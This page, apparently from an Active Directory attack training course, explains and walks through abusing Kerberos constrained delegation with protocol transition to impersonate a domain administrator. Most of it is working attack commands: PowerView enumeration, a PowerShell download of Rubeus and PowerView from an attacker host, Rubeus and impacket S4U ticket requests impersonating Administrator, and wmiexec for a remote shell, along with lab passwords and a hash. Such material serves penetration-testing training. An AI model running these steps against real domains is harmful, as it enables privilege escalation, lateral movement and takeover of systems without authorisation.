> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/delegations/constrain-delegation/with-protocol-transmition.md).

# With Protocol Transmition

Today, we are talking about the exploitation of Kerberos protocol extensions [S4U2Self](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13) and [S4U2Proxy](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/bde93b0e-f3c9-4ddf-9f44-e1453be7af5a) in order to impersonate a privileged user of the domain.

This post aims at focusing on the [Kerberos constrained delegation with protocol transition](https://docs.microsoft.com/fr-fr/previous-versions/windows/it-pro/windows-server-2003/cc739587\(v=ws.10\)) which we will shorten `T2A4D` (**TrustedToAuthForDelegation**); how to enumerate it, how to exploit it and use it as a method of persistence.

If a service is configured with constrained delegation **with protocol transition**, then it can obtain a service ticket on behalf of a user by combining S4U2self and S4U2proxy requests, as long as the user is not sensitive for delegation, or a member of the "Protected Users" group. The service ticket can then be used with [pass-the-ticket](broken://pages/-MHRwLZTmdgdu5Nwy8vd). This process is similar to [resource-based contrained delegation](broken://pages/-MlKjxxjjfRipti4cuhr) exploitation.

<https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained>

Now in the last section we talked about **Unconstrained Delegation** which allows Severs to authenticate to resources on your behalf by taking your `TGT` alongside the `TGS` ticket. Now **Unconstrained Delegation** has no limits in terms of what Kerberos services a Server can authenticate to on your behalf. i/e Once you have handed over your `TGT` if the server is trusted for **Unconstrained Delegation** then it can theoretically request a `TGS` ticket for any other Kerberos Service within the `Realm` which isn’t exactly ideal.

This is where **Constrained Delegation** comes into play.

Once Microsoft realized there Mistake with **Unconstrained Delegation** they came up with a couple of Kerberos extensions namely - `S4U2Self` & `S4U2Proxy` - Long story short basically `Constrained Delegation` limits what services a particular machine trusted for Delegation can actually access on behalf of an authenticated user

Just like **Unconstrained Delegation**, you can configure **Constrained Delegation** from `Active Directory Users and Computers` as well as limit authentication to Kerberos and/or other protocol’s.

### From Windows

#### With PowerView

```
import-module .\PowerView_dev.ps1
#The service account must have the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION – T2A4D UserAccountControl attribute

#Enumerate users and computers with constrained delegation enabled
Get-DomainUser –TrustedToAuth
Get-DomainComputer –TrustedToAuth
```

If you want to take a look at it, login with Fernando.Alonzo

```
xfreerdp /d:north.newyork.local /u:fernando.alonzo /p:'IDr1R3allyF@sTF1!' /v:192.168.56.11 /size:80%  /cert-ignore
```

#### With protocol transition <a href="#with-protocol-transition" id="with-protocol-transition"></a>

<figure><img src="/files/ftegz9BsPtpG1hjbjcxj" alt=""><figcaption></figcaption></figure>

#### Upload Rubeus & Powerview

```
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/Rubeus.exe', 'C:\Users\elena.lopez\desktop\Rubeus.exe')

powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.56.31:8000/PowerView.ps1', 'C:\Users\elena.lopez\desktop\PowerView.ps1')
```

* To abuse the constrained delegation with protocol transition, the concept is to first ask a TGT for the user and execute S4U2Self followed by a S4U2Proxy to impersonate an admin user to the SPN on the target.
* From windows with Rubeus:

```
.\Rubeus.exe asktgt /user:elena.lopez /password:princesa1 /domain:north.newyork.local 
or
.\Rubeus.exe asktgt /user:elena.lopez /domain:north.newyork.local /rc4:B8D76E56E9DAC90539AFF05E3CCB1755

.\Rubeus.exe s4u /ticket:put_the__previous_ticket_here /impersonateuser:administrator /msdsspn:CIFS/bronx /ptt
```

### From Linux

* From linux with impacket:

```
findDelegation.py NORTH.NEWYORK.LOCAL/elena.lopez:princesa1  -target-domain north.newyork.local
```

<figure><img src="/files/fHsgEntmkjnpTDEASiW5" alt=""><figcaption></figcaption></figure>

```
getST.py -spn 'CIFS/bronx' -impersonate Administrator -dc-ip '192.168.56.11' 'north.newyork.local/elena.lopez:princesa1'
```

* And next we can use the TGS to connect to smb and get a shell with psexec, smbexec, wmiexec, …<br>

<figure><img src="/files/2t4fdAXeZT5g9iVDL6zI" alt=""><figcaption></figcaption></figure>

```
export KRB5CCNAME=/home/kali/Administrator@CIFS_bronx@NORTH.NEWYORK.LOCAL.ccache
wmiexec.py -k -no-pass north.newyork.local/administrator@bronx
```

<figure><img src="/files/k9XscYwJrXH30nV8NEnV" alt=""><figcaption></figcaption></figure>

A good thing to know is that the SPN part is not encrypted in the request, so you can change it to the one you want with the following options :

* on rubeus : /altservice
* on impacket : -altservice

> SPN lists Carlos Polop (hacktricks), give a us a useful list of the common SPN and usage on his [silver ticket page](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/silver-ticket#available-services)

<br>

### From old Course
